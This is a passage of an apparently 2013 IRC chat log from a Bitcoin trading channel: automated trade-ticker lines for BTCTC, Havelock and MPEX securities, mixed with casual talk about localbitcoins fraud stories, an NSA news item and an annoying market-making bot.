08:08:16 [BTCTC] [LABCOIN] 200 @ 0.002154 = 0.4308 BTC [+] Aug 03 08:08:17 [BTCTC] [LABCOIN] 81 @ 0.002182 = 0.1767 BTC [+] Aug 03 08:08:18 [BTCTC] [LABCOIN] 90 @ 0.002183 = 0.1965 BTC [+] Aug 03 08:08:19 [BTCTC] [LABCOIN] 166 @ 0.002193 = 0.364 BTC [+] Aug 03 08:08:20 [BTCTC] [LABCOIN] 1000 @ 0.002194 = 2.194 BTC [+] Aug 03 08:08:39 [BTCTC] [LABCOIN] 3 @ 0.002195 = 0.0066 BTC [+] Aug 03 08:08:40 [BTCTC] [LABCOIN] 20 @ 0.002196 = 0.0439 BTC [+] Aug 03 08:08:42 [BTCTC] [LABCOIN] 430 @ 0.002197 = 0.9447 BTC [+] Aug 03 08:08:55 [BTCTC] [LABCOIN] 400 @ 0.002194 = 0.8776 BTC [-] Aug 03 08:09:02 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [+] Aug 03 08:09:04 [BTCTC] [ASICMINER-PT] 3 @ 4.095 = 12.285 BTC [+] Aug 03 08:09:05 [BTCTC] [ASICMINER-PT] 1 @ 4.096 BTC [+] Aug 03 08:09:06 [BTCTC] [ASICMINER-PT] 6 @ 4.098 = 24.588 BTC [+] Aug 03 08:09:07 [BTCTC] [ASICMINER-PT] 2 @ 4.145 = 8.29 BTC [+] Aug 03 08:09:09 [BTCTC] [ASICMINER-PT] 1 @ 4.146 BTC [+] Aug 03 08:09:09 [BTCTC] [ASICMINER-PT] 1 @ 4.148 BTC [+] Aug 03 08:09:10 [BTCTC] [ASICMINER-PT] 1 @ 4.149 BTC [+] Aug 03 08:09:11 [BTCTC] [ASICMINER-PT] 1 @ 4.149 BTC [+] Aug 03 08:09:22 [BTCTC] [ASICMINER-PT] 9 @ 4.15 = 37.35 BTC [+] Aug 03 08:09:23 [BTCTC] [BTCGARDEN] 1460 @ 0.016 = 23.36 BTC [+] Aug 03 08:09:24 [BTCTC] [ASICMINER-PT] 1 @ 4.165 BTC [+] Aug 03 08:09:26 [BTCTC] [ASICMINER-PT] 1 @ 4.168 BTC [+] Aug 03 08:09:27 [BTCTC] [ASICMINER-PT] 1 @ 4.169 BTC [+] Aug 03 08:09:29 [BTCTC] [ASICMINER-PT] 2 @ 4.17 = 8.34 BTC [+] Aug 03 08:09:30 [BTCTC] [ASICMINER-PT] 1 @ 4.17 BTC [+] Aug 03 08:09:30 [BTCTC] [ASICMINER-PT] 2 @ 4.179 = 8.358 BTC [+] Aug 03 08:09:31 [BTCTC] [ASICMINER-PT] 1 @ 4.179 BTC [+] Aug 03 08:09:32 [BTCTC] [ASICMINER-PT] 8 @ 4.188 = 33.504 BTC [+] Aug 03 08:09:34 [HAVELOCK] [XBOND] 2170 @ 0.001 = 2.17 BTC [+] Aug 03 08:10:56 [HAVELOCK] [XBOND] 347 @ 0.001 = 0.347 BTC [+] Aug 03 08:11:03 [BTCTC] [TAT.ASICMINER] 54 @ 0.0399 = 2.1546 BTC [+] Aug 03 08:12:12 [HAVELOCK] [XBOND] 8157 @ 0.001 = 8.157 BTC [+] Aug 03 08:13:15 [BTCTC] [LABCOIN] 240 @ 0.002014 = 0.4834 BTC [-] Aug 03 08:13:17 [BTCTC] [LABCOIN] 949 @ 0.002012 = 1.9094 BTC [-] Aug 03 08:13:18 [BTCTC] [LABCOIN] 45 @ 0.002011 = 0.0905 BTC [-] Aug 03 08:13:19 [BTCTC] [LABCOIN] 1 @ 0.002001 BTC [-] Aug 03 08:13:20 [BTCTC] [LABCOIN] 5 @ 0.002 = 0.01 BTC [-] Aug 03 08:13:21 [BTCTC] [LABCOIN] 3 @ 0.002 = 0.006 BTC [-] Aug 03 08:14:19 [BTCTC] [BTCGARDEN] 1567 @ 0.016 = 25.072 BTC [+] Aug 03 08:14:53 [BTCTC] [DMS.MINING] 6 @ 0.009944 = 0.0597 BTC [-] Aug 03 08:14:54 [BTCTC] [DMS.MINING] 20 @ 0.009945 = 0.1989 BTC [+] Aug 03 08:16:25 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 08:18:14 [BTCTC] [ACTIVEMINING] 26 @ 0.006227 = 0.1619 BTC [-] Aug 03 08:18:16 [BTCTC] [ACTIVEMINING] 81 @ 0.00622 = 0.5038 BTC [-] Aug 03 08:18:28 [BTCTC] [ACTIVEMINING] 1 @ 0.006299 BTC [+] Aug 03 08:19:11 [BTCTC] [ASICMINER-PT] 3 @ 4.01 = 12.03 BTC [-] Aug 03 08:19:42 [BTCTC] [ACTIVEMINING] 11 @ 0.006299 = 0.0693 BTC [+] Aug 03 08:21:05 [BTCTC] [TAT.ASICMINER] 48 @ 0.039 = 1.872 BTC [-] Aug 03 08:22:38 [HAVELOCK] [XBOND] 3170 @ 0.001 = 3.17 BTC [+] Aug 03 08:22:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006217 = 0.1554 BTC [-] Aug 03 08:22:46 [BTCTC] [ACTIVEMINING] 1 @ 0.006216 BTC [-] Aug 03 08:22:48 [BTCTC] [ACTIVEMINING] 217 @ 0.006147 = 1.3339 BTC [-] Aug 03 08:22:50 [BTCTC] [ACTIVEMINING] 457 @ 0.006147 = 2.8092 BTC [-] Aug 03 08:23:08 [BTCTC] [BTCGARDEN] 54 @ 0.016 = 0.864 BTC [+] Aug 03 08:23:57 [BTCTC] [LABCOIN] 748 @ 0.002001 = 1.4967 BTC [+] Aug 03 08:26:33 [BTCTC] [BTCGARDEN] 2391 @ 0.016 = 38.256 BTC [+] Aug 03 08:27:35 [BTCTC] [LABCOIN] 510 @ 0.001955 = 0.9971 BTC [-] Aug 03 08:27:54 [BTCTC] [LABCOIN] 68 @ 0.001954 = 0.1329 BTC [-] Aug 03 08:27:55 [BTCTC] [LABCOIN] 100 @ 0.001954 = 0.1954 BTC [-] Aug 03 08:28:53 [BTCTC] [LABCOIN] 17 @ 0.001953 = 0.0332 BTC [-] Aug 03 08:29:31 [HAVELOCK] [XBOND] 4280 @ 0.001 = 4.28 BTC [+] Aug 03 08:29:34 [HAVELOCK] [XBOND] 1 @ 0.001 BTC [+] Aug 03 08:29:55 [BTCTC] [BTC-TRADING-PT] 1 @ 0.8 BTC [-] Aug 03 08:30:23 is there any other ways to read the bitcointalk forums? like a listserve or something? Aug 03 08:30:28 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 03 08:30:59 "Every leader who would rather be in charge of something badly run than part of something well run is not the CEO of their EVE corp, they are the CEO of your EVE corp. And its up to you if they ever learn this or not." Aug 03 08:31:05 dude eve is like... more advanced than bitcoin. Aug 03 08:31:14 Wild0wnes not unless you make it. Aug 03 08:31:24 [HAVELOCK] [XBOND] 34 @ 0.001 = 0.034 BTC [+] Aug 03 08:31:35 <-(makes it) Aug 03 08:32:09 thnx mircea Aug 03 08:34:05 [BTCTC] [DMS.SELLING] 26 @ 0.025 = 0.65 BTC [+] Aug 03 08:35:48 [BTCTC] [LABCOIN] 1 @ 0.001996 BTC [+] Aug 03 08:35:50 [BTCTC] [LABCOIN] 65 @ 0.001954 = 0.127 BTC [-] Aug 03 08:35:51 [BTCTC] [LABCOIN] 393 @ 0.001953 = 0.7675 BTC [-] Aug 03 08:35:52 [BTCTC] [LABCOIN] 100 @ 0.001951 = 0.1951 BTC [-] Aug 03 08:35:53 [BTCTC] [LABCOIN] 500 @ 0.00195 = 0.975 BTC [-] Aug 03 08:35:54 [BTCTC] [LABCOIN] 100 @ 0.00195 = 0.195 BTC [-] Aug 03 08:35:55 [BTCTC] [LABCOIN] 583 @ 0.001931 = 1.1258 BTC [-] Aug 03 08:35:56 [BTCTC] [LABCOIN] 500 @ 0.00193 = 0.965 BTC [-] Aug 03 08:35:57 [BTCTC] [LABCOIN] 3000 @ 0.00193 = 5.79 BTC [-] Aug 03 08:35:58 [BTCTC] [LABCOIN] 33 @ 0.001926 = 0.0636 BTC [-] Aug 03 08:35:59 [BTCTC] [LABCOIN] 200 @ 0.001925 = 0.385 BTC [-] Aug 03 08:36:00 [BTCTC] [LABCOIN] 83 @ 0.001921 = 0.1594 BTC [-] Aug 03 08:36:01 [BTCTC] [LABCOIN] 500 @ 0.00192 = 0.96 BTC [-] Aug 03 08:36:02 [BTCTC] [LABCOIN] 166 @ 0.001913 = 0.3176 BTC [-] Aug 03 08:36:03 [BTCTC] [LABCOIN] 1000 @ 0.001912 = 1.912 BTC [-] Aug 03 08:36:04 [BTCTC] [LABCOIN] 126 @ 0.001911 = 0.2408 BTC [-] Aug 03 08:36:05 [BTCTC] [LABCOIN] 2500 @ 0.00191 = 4.775 BTC [-] Aug 03 08:36:06 [BTCTC] [LABCOIN] 100 @ 0.001904 = 0.1904 BTC [-] Aug 03 08:36:07 [BTCTC] [LABCOIN] 149 @ 0.001903 = 0.2835 BTC [-] Aug 03 08:36:08 [BTCTC] [LABCOIN] 10000 @ 0.001902 = 19.02 BTC [-] Aug 03 08:36:09 [BTCTC] [LABCOIN] 25 @ 0.001901 = 0.0475 BTC [-] Aug 03 08:36:10 [BTCTC] [LABCOIN] 488 @ 0.001901 = 0.9277 BTC [-] Aug 03 08:36:11 [BTCTC] [LABCOIN] 1950 @ 0.001901 = 3.707 BTC [-] Aug 03 08:36:12 [BTCTC] [LABCOIN] 2000 @ 0.0019 = 3.8 BTC [-] Aug 03 08:36:13 [BTCTC] [LABCOIN] 5000 @ 0.0019 = 9.5 BTC [-] Aug 03 08:36:15 [BTCTC] [BTCGARDEN] 209 @ 0.016 = 3.344 BTC [+] Aug 03 08:36:30 [BTCTC] [ACTIVEMINING] 25 @ 0.006011 = 0.1503 BTC [-] Aug 03 08:36:31 [BTCTC] [ACTIVEMINING] 16 @ 0.00601 = 0.0962 BTC [-] Aug 03 08:39:23 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 08:40:00 [BTCTC] [BTCGARDEN] 400 @ 0.016 = 6.4 BTC [+] Aug 03 08:40:44 [HAVELOCK] [XBOND] 4390 @ 0.001 = 4.39 BTC [+] Aug 03 08:41:32 [BTCTC] [LABCOIN] 1 @ 0.002045 BTC [+] Aug 03 08:42:17 [BTCTC] [ASICMINER-PT] 3 @ 4.135 = 12.405 BTC [+] Aug 03 08:42:18 [BTCTC] [ASICMINER-PT] 2 @ 4.136 = 8.272 BTC [+] Aug 03 08:46:47 [BTCTC] [BTCGARDEN] 1312 @ 0.016 = 20.992 BTC [+] Aug 03 08:47:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.0404 = 0.1212 BTC [+] Aug 03 08:47:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.0404 = 2.02 BTC [+] Aug 03 08:47:23 [BTCTC] [TAT.ASICMINER] 12 @ 0.04046 = 0.4855 BTC [+] Aug 03 08:47:24 [BTCTC] [TAT.ASICMINER] 25 @ 0.04049 = 1.0123 BTC [+] Aug 03 08:49:56 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 08:52:21 [BTCTC] [BTCGARDEN] 106 @ 0.016 = 1.696 BTC [+] Aug 03 08:53:17 [BTCTC] [TAT.ASICMINER] 35 @ 0.0405 = 1.4175 BTC [+] Aug 03 08:53:26 [BTCTC] [LABCOIN] 7 @ 0.001999 = 0.014 BTC [-] Aug 03 08:56:48 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 03 08:56:52 https://bitcointalk.org/index.php?topic=266570.msg2850930#msg2850930 Aug 03 08:56:55 check that shit out. Aug 03 08:56:56 How bitcoin sellers are defrauded at localbitcoins.com Aug 03 08:58:02 [HAVELOCK] [LABCO] 5 @ 0.0029 = 0.0145 BTC [+] Aug 03 08:58:23 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 08:58:58 [BTCTC] [CRYPTO-TRADE] 40 @ 0.1999 = 7.996 BTC [+] Aug 03 08:58:59 [BTCTC] [CRYPTO-TRADE] 100 @ 0.1999 = 19.99 BTC [+] Aug 03 08:59:00 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1999 BTC [+] Aug 03 08:59:36 [BTCTC] [BTCGARDEN] 1250 @ 0.016 = 20 BTC [+] Aug 03 09:00:16 pew Aug 03 09:00:50 there is another bad story of lb i remember from some days ago, sec Aug 03 09:01:01 http://www.reddit.com/r/Bitcoin/comments/1jc2ih/do_not_ever_use_localbitcoin_escrow/ Aug 03 09:01:08 Do not ever use localbitcoin escrow : Bitcoin Aug 03 09:01:13 hm. sucks. Aug 03 09:01:21 [BTCTC] [BTCGARDEN] 56 @ 0.016 = 0.896 BTC [+] Aug 03 09:01:50 and the follow up - http://www.reddit.com/r/Bitcoin/comments/1jeq7n/follow_up_on_do_not_ever_use_localbitcoin_escrow/ Aug 03 09:02:26 tl;tr reputable seller was scammed by buyer who faked messages for an alleged trade which never happend Aug 03 09:03:50 [BTCTC] [BITVPS] 10 @ 0.001901 = 0.019 BTC [+] Aug 03 09:04:49 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 09:06:36 [BTCTC] [ACTIVEMINING] 25 @ 0.006282 = 0.1571 BTC [+] Aug 03 09:06:37 [BTCTC] [ACTIVEMINING] 6 @ 0.006283 = 0.0377 BTC [+] Aug 03 09:06:39 [BTCTC] [ACTIVEMINING] 10 @ 0.006296 = 0.063 BTC [+] Aug 03 09:06:40 [BTCTC] [ACTIVEMINING] 107 @ 0.006297 = 0.6738 BTC [+] Aug 03 09:06:41 [BTCTC] [ACTIVEMINING] 563 @ 0.006299 = 3.5463 BTC [+] Aug 03 09:06:42 [BTCTC] [ACTIVEMINING] 175 @ 0.00635 = 1.1113 BTC [+] Aug 03 09:06:43 [BTCTC] [ACTIVEMINING] 114 @ 0.006425 = 0.7325 BTC [+] Aug 03 09:06:56 [BTCTC] [BTCGARDEN] 117 @ 0.016 = 1.872 BTC [+] Aug 03 09:07:08 [BTCTC] [ASICMINER-PT] 1 @ 4.023 BTC [-] Aug 03 09:07:09 [BTCTC] [ASICMINER-PT] 1 @ 4.022 BTC [-] Aug 03 09:09:41 [BTCTC] [COGNITIVE] 1 @ 0.4801 BTC [-] Aug 03 09:09:42 [BTCTC] [COGNITIVE] 1 @ 0.4801 BTC [-] Aug 03 09:09:44 [BTCTC] [COGNITIVE] 1 @ 0.4801 BTC [-] Aug 03 09:09:45 [BTCTC] [COGNITIVE] 2 @ 0.48 = 0.96 BTC [-] Aug 03 09:09:46 [BTCTC] [COGNITIVE] 1 @ 0.47 BTC [-] Aug 03 09:10:00 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 09:10:51 [BTCTC] [BTCGARDEN] 25634 @ 0.016 = 410.144 BTC [+] Aug 03 09:11:03 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 09:12:51 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 09:12:59 [BTCTC] [BTCGARDEN] 204 @ 0.016 = 3.264 BTC [+] Aug 03 09:14:08 [BTCTC] [LABCOIN] 131 @ 0.001999 = 0.2619 BTC [-] Aug 03 09:14:50 [BTCTC] [ASICMINER-PT] 2 @ 4.041 = 8.082 BTC [+] Aug 03 09:14:51 [BTCTC] [ASICMINER-PT] 3 @ 4.04 = 12.12 BTC [-] Aug 03 09:15:20 [BTCTC] [ASICMINER-PT] 1 @ 4.04 BTC [-] Aug 03 09:15:25 [BTCTC] [BTCGARDEN] 2187 @ 0.016 = 34.992 BTC [+] Aug 03 09:15:36 [BTCTC] [LABCOIN] 789 @ 0.002 = 1.578 BTC [+] Aug 03 09:15:38 [BTCTC] [ASICMINER-PT] 11 @ 4.04 = 44.44 BTC [-] Aug 03 09:15:45 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 09:16:24 [BTCTC] [ASICMINER-PT] 2 @ 4.017 = 8.034 BTC [-] Aug 03 09:16:26 [BTCTC] [ASICMINER-PT] 4 @ 4 = 16 BTC [-] Aug 03 09:16:26 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Aug 03 09:17:06 [BTCTC] [BTCGARDEN] 1500 @ 0.016 = 24 BTC [+] Aug 03 09:18:03 mircea_popescu: I scoured the shit our of Trilema, only got 9 so far: https://gist.github.com/leffuy/750a4291264fa2de03a5 Aug 03 09:18:13 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 03 09:19:34 btctc down for anyone else? Aug 03 09:19:44 dw working now, mashed my f5 too hard Aug 03 09:19:57 [BTCTC] [TAT.ASICMINER] 22 @ 0.0405 = 0.891 BTC [+] Aug 03 09:20:11 and now we know who made that trade Aug 03 09:20:15 [BTCTC] [LABCOIN] 525 @ 0.001933 = 1.0148 BTC [-] Aug 03 09:20:16 [BTCTC] [BTCGARDEN] 65 @ 0.016 = 1.04 BTC [+] Aug 03 09:20:17 [BTCTC] [LABCOIN] 1000 @ 0.001931 = 1.931 BTC [-] Aug 03 09:20:19 [BTCTC] [LABCOIN] 40 @ 0.00193 = 0.0772 BTC [-] Aug 03 09:20:20 [BTCTC] [LABCOIN] 500 @ 0.001927 = 0.9635 BTC [-] Aug 03 09:20:21 [BTCTC] [LABCOIN] 60 @ 0.001926 = 0.1156 BTC [-] Aug 03 09:20:22 [BTCTC] [LABCOIN] 10 @ 0.00191 = 0.0191 BTC [-] Aug 03 09:20:23 [BTCTC] [LABCOIN] 500 @ 0.001899 = 0.9495 BTC [-] Aug 03 09:20:24 [BTCTC] [LABCOIN] 1000 @ 0.001899 = 1.899 BTC [-] Aug 03 09:20:25 [BTCTC] [LABCOIN] 24 @ 0.001898 = 0.0456 BTC [-] Aug 03 09:20:26 [BTCTC] [LABCOIN] 214 @ 0.001898 = 0.4062 BTC [-] Aug 03 09:20:27 [BTCTC] [LABCOIN] 699 @ 0.001897 = 1.326 BTC [-] Aug 03 09:20:33 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 03 09:20:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0028 BTC [-] Aug 03 09:21:11 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.00276 = 0.138 BTC [-] Aug 03 09:21:25 [BTCTC] [RSM] 38 @ 0.01177 = 0.4473 BTC [-] Aug 03 09:21:28 [BTCTC] [TAT.VIRTUALMINE] 70 @ 0.002755 = 0.1929 BTC [-] Aug 03 09:21:33 [BTCTC] [ACTIVEMINING] 2 @ 0.006297 = 0.0126 BTC [-] Aug 03 09:21:43 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.002702 = 0.1324 BTC [-] Aug 03 09:21:58 [BTCTC] [RSM] 10 @ 0.01176 = 0.1176 BTC [-] Aug 03 09:21:59 [BTCTC] [RSM] 10 @ 0.01175 = 0.1175 BTC [-] Aug 03 09:22:01 [BTCTC] [RSM] 1 @ 0.01168 BTC [-] Aug 03 09:22:02 [BTCTC] [RSM] 20 @ 0.01135 = 0.227 BTC [-] Aug 03 09:22:03 [BTCTC] [RSM] 2 @ 0.01135 = 0.0227 BTC [-] Aug 03 09:22:04 [BTCTC] [RSM] 16 @ 0.01135 = 0.1816 BTC [-] Aug 03 09:22:09 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 09:22:11 thestringpuller lol github. qwhy not make a blog ? Aug 03 09:22:35 files are cool maaaan Aug 03 09:22:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.04049 = 0.081 BTC [-] Aug 03 09:22:47 heyhe mkay. Aug 03 09:22:59 [BTCTC] [BTCGARDEN] 4000 @ 0.016 = 64 BTC [+] Aug 03 09:23:01 how do you like those 9 so far? Aug 03 09:23:05 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 09:23:24 [BTCTC] [BTCGARDEN] 60 @ 0.016 = 0.96 BTC [+] Aug 03 09:23:26 [HAVELOCK] [XBOND] 200 @ 0.001 = 0.2 BTC [+] Aug 03 09:23:52 [BTCTC] [BTCGARDEN] 37 @ 0.016 = 0.592 BTC [+] Aug 03 09:24:03 [BTCTC] [DMS.SELLING] 400 @ 0.02376 = 9.504 BTC [-] Aug 03 09:24:19 [BTCTC] [LABCOIN] 236 @ 0.001934 = 0.4564 BTC [+] Aug 03 09:24:27 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 03 09:25:12 [BTCTC] [BTCGARDEN] 650 @ 0.016 = 10.4 BTC [+] Aug 03 09:25:24 [BTCTC] [BTCGARDEN] 28 @ 0.016 = 0.448 BTC [+] Aug 03 09:25:32 [BTCTC] [BTCGARDEN] 4 @ 0.016 = 0.064 BTC [+] Aug 03 09:25:39 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 09:26:02 i must admit they're pretty ghood Aug 03 09:26:32 meanwhile back at the ranch, http://www.thedailysheeple.com/feds-visit-family-who-googled-backpacks-pressure-cookers-but-the-nsa-isnt-watching-you_082013 Aug 03 09:26:34 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 09:27:14 lol Aug 03 09:27:16 [HAVELOCK] [AM100] 1 @ 0.0366 BTC [+] Aug 03 09:27:35 whose bot is this destroying actm shares by constantly placing 25 at lower than the last ask? Aug 03 09:27:53 [BTCTC] [TAT.MINIGAME] 1 @ 0.000247 BTC [+] Aug 03 09:28:12 [BTCTC] [TAT.MINIGAME] 29 @ 0.0002401 = 0.007 BTC [-] Aug 03 09:28:53 [BTCTC] [ACTIVEMINING] 1 @ 0.006073 BTC [-] Aug 03 09:29:10 [BTCTC] [LABCOIN] 127 @ 0.001935 = 0.2457 BTC [+] Aug 03 09:30:05 [BTCTC] [BTCGARDEN] 544 @ 0.016 = 8.704 BTC [+] Aug 03 09:32:49 Have you ever looked up how to make a pressure cooker bomb? My husband, ever the oppositional kind, asked them if they themselves weren’t curious as to how a pressure cooker bomb works, if they ever looked it up. Two of them admitted they did. < lol Aug 03 09:33:53 very disturbing story Aug 03 09:34:16 [BTCTC] [BTCGARDEN] 488 @ 0.016 = 7.808 BTC [+] Aug 03 09:34:18 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 09:34:37 [02:27] whose bot is this destroying actm shares by constantly placing 25 at lower than the last ask? Aug 03 09:34:41 Rawted: those bots are on btct for some time now, they usually have a position on both sides and trade the spread range Aug 03 09:34:44 [BTCTC] [BTCGARDEN] 160 @ 0.016 = 2.56 BTC [+] Aug 03 09:34:47 Bot? They don't need a bot for that Aug 03 09:35:03 it's instant, has to be a bot Aug 03 09:35:12 really fucking annoying Aug 03 09:36:26 [BTCTC] [ACTIVEMINING] 1 @ 0.006298 BTC [+] Aug 03 09:36:45 so if the bot is that dumb, drive the offer down and then lift it Aug 03 09:37:02 [BTCTC] [BTCGARDEN] 10000 @ 0.016 = 160 BTC [+] Aug 03 09:37:17 [BTCTC] [BTCGARDEN] 35 @ 0.016 = 0.56 BTC [+] Aug 03 09:37:37 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 09:37:45 it's really fast ;) Aug 03 09:37:55 [BTCTC] [BTCGARDEN] 7986 @ 0.016 = 127.776 BTC [+] Aug 03 09:38:10 and moves if you place 1 share Aug 03 09:38:19 [BTCTC] [BTCGARDEN] 16 @ 0.016 = 0.256 BTC [+] Aug 03 09:38:21 It died Aug 03 09:38:22 yup, and keeps replenishing the 25 shares automatically. Aug 03 09:38:43 hft strikes again Aug 03 09:38:43 [BTCTC] [BTCGARDEN] 450 @ 0.016 = 7.2 BTC [+] Aug 03 09:38:50 again? Aug 03 09:39:24 lol Aug 03 09:39:39 youre right Aug 03 09:39:49 where are the 25 now? Aug 03 09:39:50 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 03 09:40:07 It had a 25 bid at 0.006081, I bought 1 share and put it for sale at 0.006082. Both disappeared. Aug 03 09:40:12 I fucked it Aug 03 09:40:17 [BTCTC] [LABCOIN] 12 @ 0.0019 = 0.0228 BTC [-] Aug 03 09:40:18 [BTCTC] [LABCOIN] 2 @ 0.001899 = 0.0038 BTC [-] Aug 03 09:40:20 [BTCTC] [LABCOIN] 700 @ 0.001899 = 1.3293 BTC [-] Aug 03 09:40:21 [BTCTC] [LABCOIN] 499 @ 0.001897 = 0.9466 BTC [-] Aug 03 09:40:22 [BTCTC] [LABCOIN] 3787 @ 0.001892 = 7.165 BTC [-] Aug 03 09:40:24 [BTCTC] [LABCOIN] 166 @ 0.001999 = 0.3318 BTC [+] Aug 03 09:40:24 Can't have both buy and sale at 0.006081 Aug 03 09:40:24 [BTCTC] [LABCOIN] 834 @ 0.002 = 1.668 BTC [+] Aug 03 09:40:26 lmao namworld Aug 03 09:40:40 lol Aug 03 09:40:55 i wanted to test it's range Aug 03 09:41:04 Bot was confused Aug 03 09:41:06 meh its back Aug 03 09:41:11 new 25 there Aug 03 09:41:13 on both sides Aug 03 09:41:45 trying to get some more btcgarden and bitvps, guess ill have to transfer out of cold storage Aug 03 09:41:45 only way to beat a bot is with a bot or with capital Aug 03 09:42:02 it moves back, if you pull your order Aug 03 09:42:14 BitVPS doesn't get a whole lot Aug 03 09:42:19 [BTCTC] [LABCOIN] 166 @ 0.002 = 0.332 BTC [+] Aug 03 09:42:22 In terms of APR Aug 03 09:42:47 Yeah, but i'm enjoying the new direction and the work you and arij are putting in, so im tossing it some btc. Aug 03 09:43:12 [BTCTC] [BTCGARDEN] 2495 @ 0.016 = 39.92 BTC [+] Aug 03 09:43:36 [BTCTC] [LABCOIN] 165 @ 0.002069 = 0.3414 BTC [+] Aug 03 09:45:11 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 09:46:02 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 03 09:46:27 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 09:47:12 [BTCTC] [ACTIVEMINING] 1 @ 0.006045 BTC [-] Aug 03 09:47:27 [BTCTC] [BTCGARDEN] 53 @ 0.016 = 0.848 BTC [+] Aug 03 09:47:35 lol damn that bot, i give up. Aug 03 09:47:46 [BTCTC] [ACTIVEMINING] 25 @ 0.006109 = 0.1527 BTC [+] Aug 03 09:48:45 the bot is confused Aug 03 09:48:52 range too small to place the ask Aug 03 09:49:02 and now it removes and replaces the bid over and over again Aug 03 09:49:31 [BTCTC] [ACTIVEMINING] 197 @ 0.006298 = 1.2407 BTC [+] Aug 03 09:49:48 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 09:49:51 there we go, someone's buying my shares now Aug 03 09:50:32 [HAVELOCK] [XBOND] 9397 @ 0.001 = 9.397 BTC [+] Aug 03 09:51:20 [BTCTC] [TAT.MINIGAME] 1 @ 0.000264 BTC [+] Aug 03 09:51:35 [BTCTC] [ACTIVEMINING] 40 @ 0.006298 = 0.2519 BTC [+] Aug 03 09:51:58 [BTCTC] [BITVPS] 250 @ 0.00161 = 0.4025 BTC [-] Aug 03 09:52:09 Rawted: i'd just ignore it. 25 shares aren't really influential Aug 03 09:52:41 [MPEX] [S.MPOE] 7500 @ 0.00082403 = 6.1802 BTC [-] Aug 03 09:52:45 [BTCTC] [BTCGARDEN] 8000 @ 0.016 = 128 BTC [+] Aug 03 09:52:48 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 03 09:53:30 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 09:53:54 [BTCTC] [BTCGARDEN] 36 @ 0.016 = 0.576 BTC [+] Aug 03 09:56:41 [BTCTC] [LABCOIN] 987 @ 0.001985 = 1.9592 BTC [-] Aug 03 09:56:50 [BTCTC] [ACTIVEMINING] 29 @ 0.006298 = 0.1826 BTC [+] Aug 03 09:57:05 [BTCTC] [LABCOIN] 170 @ 0.0019 = 0.323 BTC [-] Aug 03 09:57:35 [BTCTC] [LABCOIN] 28 @ 0.0019 = 0.0532 BTC [-] Aug 03 09:57:59 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 09:58:12 [BTCTC] [BTCGARDEN] 5000 @ 0.016 = 80 BTC [+] Aug 03 09:58:15 [BTCTC] [LABCOIN] 142 @ 0.0019 = 0.2698 BTC [-] Aug 03 09:58:16 [BTCTC] [BTCGARDEN] 54 @ 0.016 = 0.864 BTC [+] Aug 03 09:58:46 [BTCTC] [DMS.SELLING] 99 @ 0.02376 = 2.3522 BTC [-] Aug 03 09:58:48 [BTCTC] [DMS.SELLING] 1 @ 0.02373 BTC [-] Aug 03 09:59:04 [BTCTC] [LABCOIN] 28 @ 0.001899 = 0.0532 BTC [-] Aug 03 09:59:06 [BTCTC] [BASIC-MINING] 2 @ 0.4379 = 0.8758 BTC [-] Aug 03 09:59:07 [BTCTC] [PAJKA.BOND] 1 @ 0.02131 BTC [-] Aug 03 09:59:12 [BTCTC] [BASIC-MINING] 1 @ 0.4379 BTC [-] Aug 03 09:59:13 [BTCTC] [BASIC-MINING] 5 @ 0.4375 = 2.1875 BTC [-] Aug 03 09:59:14 [BTCTC] [BASIC-MINING] 8 @ 0.4325 = 3.46 BTC [-] Aug 03 09:59:15 [BTCTC] [BASIC-MINING] 10 @ 0.4324 = 4.324 BTC [-] Aug 03 09:59:16 [BTCTC] [BASIC-MINING] 10 @ 0.4323 = 4.323 BTC [-] Aug 03 09:59:17 [BTCTC] [BASIC-MINING] 25 @ 0.4321 = 10.8025 BTC [-] Aug 03 09:59:18 [BTCTC] [BASIC-MINING] 4 